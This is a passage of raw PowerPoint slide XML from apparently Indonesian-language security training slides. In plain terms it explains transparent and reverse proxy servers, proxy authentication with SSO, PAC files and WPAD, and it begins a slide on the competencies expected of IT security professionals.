            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inline.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SSO) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Skrip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> proxy (PAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>campur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Web Proxy Auto-discovery (WPAD) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file PAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Server Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terbalik</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbalik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Reverse proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendengarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (Internet). Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona subnet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1227966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Kompetensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompeten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disiplin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ilmu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
